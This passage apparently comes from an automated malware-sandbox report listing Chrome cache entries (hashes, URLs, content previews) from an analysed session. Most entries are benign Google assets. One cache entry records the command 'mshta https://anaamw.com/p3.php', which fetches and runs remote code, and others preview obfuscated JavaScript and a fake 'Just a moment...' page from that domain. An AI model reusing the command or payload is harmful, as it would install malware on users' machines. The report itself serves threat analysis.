                                        Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Si=function(a){if(4&a)return 2048&a?2048:4096&a?4096:0};_.Ti=class extends _.O{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Xi,Yi,$i,aj,dj;_.Ui=function(){return typeof BigInt==="function"};Xi=function(a){const b=a>>>0;_.Vi=b;_.Wi=(a-b)/4294967296>>>0};Yi=function(a,b){b=~b;a?a=~a+1:b+=1;return[a,b]};_.Zi=function(a){if(a<0){Xi(-a);const [b,c]=Yi(_.Vi,_.Wi);_.Vi=b>>>0;_.Wi=c>>>0}else Xi(a)};$i=function(a){a=String(a);return"0000000".slice(a.length)+a};.aj=function(a,b){b>>>=0;a>>>=0;if(b<=2097151)var c=""+(4294967296*b+a);else _.Ui()?c=""+(BigInt(b)<<BigInt(32)|BigInt(a)):(c=(a>>>24|b<<8)&16777215,b=b>>16&65535,a=(a&16777215)+c*6777216+b*6710656,c+=b*8147497,b*=2,a>=1E7&&(c+=a/1E7>>>0,a%=1E7),c>=1E7&&(b+=c/1E7>>>0,c%=1E7),c=b+$i(c)+$i(a));return c};_.bj=function(a,b){if(b&2147483648)if(_.Ui())a=""+(BigInt(b|0)<<BigInt(32)|BigInt(a>>>0));else{const [c,d]=Yi(a,b);a="-"+aj(c,d)}else a=aj(a,b);return a};._

                                        Chrome Cache Entry: 65

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (5162), with no line terminators
                                        Category:downloaded
                                        Size (bytes):5162
                                        Entropy (8bit):5.349865760247148
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70A8F21806E7F1B739937970EBE49A0C
                                        SHA1:6BE9EEBCE438DE91FEB20E6A5458774B327AA9B4
                                        SHA-256:C8B531CFD6E9BE13762E289820F67406331303CD5111A885DE959BF83DD0F5AC
                                        SHA-512:3C055567D0ED53BD30773C0BE475DC7499E44AFB92FB05021029D9A0C1299A470CDD3A8CACCCF798D5345ED627C5836E9DF5955A120FE56BA3624EC76A673270
                                        Malicious:false
                                        Reputation:unknown
                                        URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.Rc_yzHk8ifQ.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuv2QHsljKVzbRNNpe_a-fLlyIBPw"
                                        Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_H .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_H .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_H .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                        Chrome Cache Entry: 66

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7889), with no line terminators
                                        Category:downloaded
                                        Size (bytes):7889
                                        Entropy (8bit):5.729736518259911
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:34FD5A5E686EBD436461775DCC8DC6F0
                                        SHA1:993F4CCBCF31D364D57BC056535DD59CA58A8001
                                        SHA-256:ED14D154B5185CAE534F1327E834107209D6415B79E07364038BB4B62FB0E212
                                        SHA-512:1BA8110341FD1E4E18B7CEB35225282F9643BEC33616F77ADD8E0B8915F45FAC0F52AE585175C51F687315BA02E33EB0E80A683531EAB6BE4F8D7D090FD7FA35
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://anaamw.com/p3.php/1?js
                                        Preview:!function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098,1090))/4)+-parseInt(r(1106,1132,1141,1087))/5*(-parseInt(r(1131,1127,1101,1158))/6)+parseInt(n(1026,985,1013,1033))/7+-parseInt(n(960,976,992,972))/8+-parseInt(n(965,947,959,926))/9*(parseInt(n(1050,985,1018,988))/10)==380790)break;t.push(t.shift())}catch(c){t.push(t.shift())}}(_0xd7d5,380790);var _0x37d22e=function(){var $={};$.KVbgB=function($,x){return $===x},$[n(827,887,857,860)]=_0x2437(485,685);var x=$;function n($,x,n,r){return _0x2437(n-340,$)}var r=!0;return function($,t){function c($,x,r,t){return n($,x-356,t-529,t-343)}function e($,x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null

                                        Chrome Cache Entry: 67

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65531)
                                        Category:downloaded
                                        Size (bytes):131010
                                        Entropy (8bit):5.436097965004934
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:699893CFCC7E6C41B5874B96C6CCF6BB
                                        SHA1:64B1810B30BE0CD52099B60DFD5A55DE86DE4570
                                        SHA-256:4856AAA186B4D34A263FD27F25FCFEAB07A59A12831BE2B373832BC266BA97FB
                                        SHA-512:46B9A36CA89F3AC4AEB85FAEA473D9332A8324E365A2C3300FD1E500FDCECCE842EB3116E4716FB7E4149A48BBB8C1C24AE1DDE04EA5E81D6BBC2187B021A418
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                        Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Qd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_ld gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Kc gb_Nc gb_R\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                        Chrome Cache Entry: 68

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):150
                                        Entropy (8bit):4.789895058880281
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:98821958EDA3B8A125D2ADFDDAA00AE3
                                        SHA1:12B2B24E13A413F9B91379E617709B75C2B91B50
                                        SHA-256:18FFC6D51A971C5BC4382D8A599D93E39B9DCF9ABC7D4A94924E1A18AB40790F
                                        SHA-512:4ECC28C30157C655219DF2A52FC69630D2B9A6D29FB5EFC28A066E563FD96F5E1BCE15A29AA551468851B48DE9BAD4A5E25143D766A5BFA76AA36F0BB1C43297
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                        Preview:)]}'.["mshta https://anaamw.com/p3.php",[],[],[],{"google:clientdata":{"bpc":true,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]

                                        Chrome Cache Entry: 69

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):1660
                                        Entropy (8bit):4.301517070642596
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:554640F465EB3ED903B543DAE0A1BCAC
                                        SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                        SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                        SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                        Chrome Cache Entry: 70

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (3796)
                                        Category:downloaded
                                        Size (bytes):3801
                                        Entropy (8bit):5.850386271588803
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:86C3051A5969686E56E26043EAD94478
                                        SHA1:03A97EFFFBCB0275704D1D8B0EBD338B950EDB56
                                        SHA-256:B15EEB012554599E661CA1A894F9C5C90C2189A6CC1477EBC01185164E7336C0
                                        SHA-512:BC9555209AAF41867A0CD2F600E7498683BC4EC1E045AE38C1D6EAA1BBB9C716413A79A06BBC1C7B4A295212C0C38EF26E046BB8794E06E0A3DD1F53776682CD
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                        Preview:)]}'.["",["nvidia stocks","doctor who amazon deal","h1b visa lottery results","pittsburgh steelers","give the manifest ac shadows","sephora sale 2025 dates","white lotus season 3","weather tornado watch"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNXRmbRINRm9vdGJhbGwgdGVhbTKeEGRhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFCQUNBTUFBQUNkdDRIc0FBQUE1MUJNVkVYLy8vK2xySzhBVTV2dXJSN0dERENxc2JTaXFhd0FBQUNkcGFpdHRMZjcrL3RkWW1UdHBnRHRxQUQyOXZieTh2THM3T3g3Z1lTcnFxcTZ2OEdLa0pQQkFBQUFRSk5nWDE4NlBUNkdoWVZQVTFYSXlNaUJoNHJMejlIazV1ZnZ0VUhYMnR0NWVYbEdTa3dBU3BlNnVia3dNelQ5OWVyMXo1TDc3ZGo0NGIzdnNUTERBQjNtcnJQc3c4YkZBQ2p1eTg3Q0FCTFozK3ByYTJyNjU4djMycXp6eUgzeXczRHh1bGFabUpqMjFKNzE0ZVB4dm1MV2NYdkhIRGpjakpUTlJsY2lJaUxMTjByaG02TFRZMjYzdzluSDBlR05vOFUrYTZkamc3UFpmb2NvWDZHZ3NzNXpqN283M2JFNEFBQ

                                        Chrome Cache Entry: 71

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:data
                                        Category:downloaded
                                        Size (bytes):29986
                                        Entropy (8bit):6.334210234577004
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3D0964A1B123B460ADE269122B1DA235
                                        SHA1:62CE6AF8E9CBC9049DEBDDD0F39AFF8A446861D1
                                        SHA-256:EDF4285652674DF24291F7EE28C572782C71E54E30A4266BE78374D1FCF839E9
                                        SHA-512:42124026812939CF3D6B114CF9BCDBCA4592C83F21B7BE04E4E3A244A361541C48565C80528554EFAD39240C18665339CC0E863070E6B50F27D80D4D48B68323
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://anaamw.com/p3.php/1
                                        Preview:<!DOCTYPE html>.<html lang="en-US" dir="ltr">.<head>. <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />. <title>Just a moment...</title>. <meta http-equiv="X-UA-Compatible" content="IE=Edge" />. <meta name="robots" content="noindex,nofollow" />. <meta name="viewport" content="width=device-width,initial-scale=1" />. <style id=a></style><script>_='*{].:0.:0}html{.T15;-webkit-|-size-adjust:100%;.}butYn,html.sys.m-ui,-appO-sys.m,Bl.kMacSys.mFontW,RoboY,Helvetica Neue,Arial,NoY Sans,sans-sGif,AppO C/.W.W Symbol,NoY C/.}.{Z.;~100vh;m.-~100vh}..no-js `visibility:hidden}J^J a{.}J .J.J &JL+{..;.}+ a{.X}+ .+ .{..595959 . .}+ .fc574a}+ .D}a{.c/:.;.X...:c/ .15s ease}....{.:8.... ...G{.:2. 0V.G-Yp.V.G.{..:2.}.~2.;.-r...2.....}.~T.TP}V.w_ppG{align-i.ms:.;Z:1;fOx.}&.h1.2.P;.;.3.7PVh2{.}.,.h2.TP;.2.2PV.-|,.{.we.400V.-|.1.;.T2P.h1.TP;.T7PVh2.T2P}.,.h2{.TP}..1.}V|-.{..{..X;.:.063..#X..313.;..;.size:.87P;.T313.;.:2. 0.:.37P 1..-du_.:.2s.-propGty:.c

                                        Chrome Cache Entry: 72

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4741)
                                        Category:downloaded
                                        Size (bytes):4746
                                        Entropy (8bit):5.822796482507237
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E905A5B0EC8C4B267459144E16DDE002
                                        SHA1:13EA9C7F5E78AA347129809F37443357EA03AFB9
                                        SHA-256:59F93ABB5A1ED121F179BA09A7FC8C3D7D3A6F7DE8473F58ECDA934C2145A924
                                        SHA-512:9EAF3277DC410C9F01AE0A539F0DB757837C709FEAC94D5532AECABD715879D752AE3D0AC38A595D773B365735303FFBA12F4A13E50122C13E9DF7DD60B29008
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                        Preview:)]}'.["",["popeyes pickle menu april fools","potato filled pastry crossword clue","minnesota weather forecast","duke cooper flagg","give the manifest ac shadows","mackinac bridge closed falling ice","national burrito day free burritos","hunger games sunrise on the reaping film"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXJxdmgxcW1oEixDb29wZXIgRmxhZ2cg4oCUIEFtZXJpY2FuIGJhc2tldGJhbGwgZm9yd2FyZDK/CmRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBQzhBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUFCZ1FGQndJSUEvL0VBREVRQU

                                        Chrome Cache Entry: 73

                                        Download File
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):19
                                        Entropy (8bit):3.6818808028034042
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9FAE2B6737B98261777262B14B586F28
                                        SHA1:79C894898B2CED39335EB0003C18B27AA8C6DDCD
                                        SHA-256:F55F6B26E77DF6647E544AE5B45892DCEA380B7A6D2BFAA1E023EA112CE81E73
                                        SHA-512:29CB8E5462B15488B0C6D5FC1673E273FB47841E9C76A4AA5415CA93CEA31B87052BBA511680F2BC9E6543A29F1BBFBA9D06FCC08F5C65BEB115EE7A9E5EFF36
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://www.google.com/async/ddljson?async=ntp:2
                                        Preview:)]}'.{"ddljson":{}}

                                        Static File Info

                                        No static file info